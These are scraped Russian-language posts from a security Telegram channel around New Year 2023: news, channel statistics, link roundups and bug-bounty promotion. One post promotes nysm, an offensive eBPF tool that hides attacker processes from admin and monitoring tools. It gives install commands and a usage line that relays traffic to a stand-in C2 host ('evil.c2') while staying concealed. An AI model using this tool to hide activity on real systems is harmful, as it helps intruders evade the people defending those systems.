E-mail Injection; Инъекции в почтовую функциональность веб-приложений

Порой разработчикам необходимо создавать формы – разделы для сбора информации от пользователей веб-приложения. Было придумано множество способов обработки и сбора ответов пользователей на формы. Выбор подходящего зависит от спектра условий: вида и предполагаемого объёма данных, допустимого объёма выделенного хранилища, желаемых характеристик доступа, ... ;

Так сложилось, что одним из вариантов решения упомянутой задачи является использование электронной почты. Электронная почта – комплексная технология, в работе которой задействован целый список компонентов.

👉 Сохраняй

🌚 @poxek

GIGANEWS. Главные события 2023 года по версии «Хакера»

Год под­ходит к кон­цу, некото­рые уже начина­ют резать салаты, а зна­чит, приш­ло вре­мя огля­нуть­ся назад и вспом­нить самые важ­ные, инте­рес­ные и забав­ные события, которы­ми он нам запом­нится. По тра­диции мы сос­тавили для тебя под­борку наибо­лее ярких взло­мов, атак, уяз­вимос­тей, фей­лов и дру­гих событий ухо­дяще­го 2023 года. Будет инте­рес­но, пог­нали!

В статье подвели итоги по следующим аспектам:
- Атака года
- Уязвимость года
- Утечка года
- Исследование года
- Блокировка года
- Нарушитель приватности года
- Малварь года
- Хардверный взлом года
- Странность года
- Фейл года
- Хайп года

👉 Очень советую прочитать тем, кто особо не следил за ИБ новостями.

🌚 @poxek

Не ну вы поняли)

Новые программы для тех, кто не собирается отдыхать на новогодние праздники

🌚 @poxek

🌚 А вот и моя статистика подъехала. Практически миллион просмотров на постах за год. Великая цифра!!
В следующем году постарается сделать как минимум х1.5, а то и больше!!
А также +3.5к подписчиков на канале, то бишь канал за этот год вырос в более чем 2 раза. Всем спасибо, что вы были этот год со мной. Следующий год обещает быть ещё более взрывным!! 🪄🪄

⚠️⚠️⚠️⚠️⚠️ Знаете что мне нравится? Аудитория канала :)

🌲 Наконец-то настали новогодние выходные. Кто-то вчера досдал проекты, кто-то планирует багхантить, пока остальные отдыхают. Я лично собираюсь так сильно отоспаться, насколько мне хватит сил. Что и вам рекомендую :D

🌚 Этот год вышел вполне успешым. Побывал мне кажется в 5 раз больше на конференциях, чем в прошлом году. Какие-то дали новых знакомых, какие-то помогли найти новую любимую работу, какие-то были душными и бесполезными (Газпром.тех я про тебя). Открытие 🏠 КиберДома было интересным событием второго полугодия 2023 года. Успешно выступал, как на тему ИБэшечка (фирменная преза), так и на тему Pivoting. За все выступления получал огромный фидбек от знакомых и ранее не знакомых людей, что было очень приятно 🙏 . Ну и конечно ребрендинг канала, который прошёл настолько успешно, насколько даже я не ожидал, если честно)

🌚 Но, но, но будущий год обещает быть ещё лучше 🌚
Новые партнёрства, постараюсь выступать почаще (если буду успевать готовить темы), прогрессивный рост канала, улучшение контента: постараюсь делать контент одновременно для начинающих ребят и для тех, кто уже разбираются.

🌚 Обязательно выпущу мерч Похек. Планируются как минимум стикерпаки и футболки. Пока проблемы с нахождением годных производителей. Если у вас есть опыт заказа, то напишите в ЛС, пожалуйста.

🌚 А ещё, кое что очень крутое готовим. Будет ... а вот узнаете в следующем году

👉Всем спасибо, дальше будет ещё интереснее!! Всех с наступающим Новым Годом ❤️

🌚 @poxek

Всех поздравляю с Новым Годом!!
🌲🌲🌲🌚🌚🌚💰💰🎁🎁

🕶 Похек попал в ежегодный список топовых ИБ-каналов

А я в каком-то смысле тоже джун...

thx @wearetyomsmnv

#meme

🌚 @poxek

🔴 nysm
Скрытый контейнер для постэксплуатации
#eBPF #offensive

С ростом популярности offensive инструментов, основанных на eBPF, начиная от кражи учетных данных и заканчивая руткитами, скрывающими свой собственный PID, авторам пришел в голову вопрос: Можно ли сделать eBPF невидимым в глазах админа? В результате они создали nysm, eBPF stealth контейнер, предназначенный для того, чтобы сделать инструменты атакующих незаметными для системных администраторов, не только скрывая eBPF, но и многое другое:
- bpftool
- bpflist-bpfcc
- ps
- top
- sockstat
- ss
- rkhunter
- chkrootkit
- lsof
- auditd
- и другое

Как это работает?

Поскольку eBPF не может перезаписывать возвращаемые значения или адреса ядра, наша цель - найти вызов самого низкого уровня, взаимодействующий с адресом пользовательского пространства, чтобы перезаписать его значение и скрыть нужные объекты. Чтобы отличить события nysm от других, все выполняется в отдельном пространстве имен PID.

Установка:

sudo apt install git make pkg-config libelf-dev clang llvm bpftool -y; git clone https://github.com/eeriedusk/nysm; cd nysm; bpftool btf dump file /sys/kernel/btf/vmlinux format c > vmlinux.h; make

Использование:

Usage: nysm [OPTION...] COMMAND
Stealth eBPF container.

  -d, --detach        Run COMMAND in background
  -r, --rm                Self destruct after execution
  -v, --verbose      Produce verbose output
  -h, --help             Display this help
  --usage                Display a short usage message

# Примеры
./nysm bash
./nysm -r ssh user@domain
./nysm -dr socat TCP4-LISTEN:80 TCP4:evil.c2:443

👉 https://github.com/eeriedusk/nysm

🌚 @poxek

🔵 Галопом по Европам: Легитимные процессы Windows на пальцах
#windows

Статья-памятка - быстро и понятно о легитимных процессах Windows: какой процесс за что отвечает, какие нормальные свойства имеют процессы, и заправка в виде небольшого количества краткой, но полезной информации.

Подойдет всем - и тем, кто боится страшных букв в Диспетчере задач, и тем, кому просто интересно, что за что отвечает, и для чего это все нужно.

Статья за авторством @exc3pt10n

⚡️ https://habr.com/en/articles/784960/

🌚 @poxek

Top 10 web hacking techniques of 2023 - конкурс открыт
#portswigger

За последний год множество исследователей в области безопасности поделились своими ресерчами с сообществом в виде записей в блогах, презентаций и технических статей.

Однако из-за огромного объема хорошие статьи могут быть упущены из виду и быстро забыты. Поэтому с 2006 года сообщество ежегодно объединяется для отбора самых интересных работ.

Подача заявок:
Чтобы подать заявку, просто укажите ссылку на исследование и, по желанию, краткий комментарий, объясняющий, что нового в этой работе.

❤️ Подать заявку на номинацию


Ниже указал актуальный список статей, которые уже отобрали для оценки в номинацию:

- Ransacking your password reset tokens
mTLS: When certificate authentication is done wrong
- Smashing the state machine: the true potential of web race conditions
- Bypass firewalls with of-CORs and typo-squatting
- RCE via LDAP truncation on hg.mozilla.org
- Cookie Bugs - Smuggling & Injection
- OAuth 2.0 Redirect URI Validation Falls Short, Literally
- Prototype Pollution in Python - Abdulrah33m's Blog
- Pretalx Vulnerabilities: How to get accepted at every conference
- From Akamai to F5 to NTLM... with love.
- Сan I speak to your manager? hacking root EPP servers to take control of zones
- Blind CSS Exfiltration: exfiltrate unknown web pages
- Compromising F5 BIGIP with Request Smuggling
- Server-side prototype pollution: Black-box detection without the DoS
- Tricks for Reliable Split-Second DNS Rebinding in Chrome and Safari
- HTML Over the Wire
- SMTP Smuggling - Spoofing E-Mails Worldwide
- DOM-based race condition: racing in the browser for fun
- Metamask Snaps: Playing in the Sand
- CVE-2022-4908: SOP bypass in Chrome using Navigation API
- Code Vulnerabilities Put Proton Mails at Risk

Моё лично мнение, что список очень интересный и в нашем комьюнити могут найтись те специалисты, которые захотят или заинтересуются отправкой своих работ в эту номинацию.

🌚 @poxek

Потратился на праздниках? Самое время начать багхантить!

Если кто не заметил, в конце года на Standoff появилось пять новых программ с выплатами до 1 млн рублей. И многие из них закроются уже в конце января.

🔜 Но если начать ломать прямо сейчас, есть все шансы получить максимальное баунти (а за некоторые криты дают даже ящик фирменного «Блэк Хета» от Standoff 365 в качестве приятного бонуса).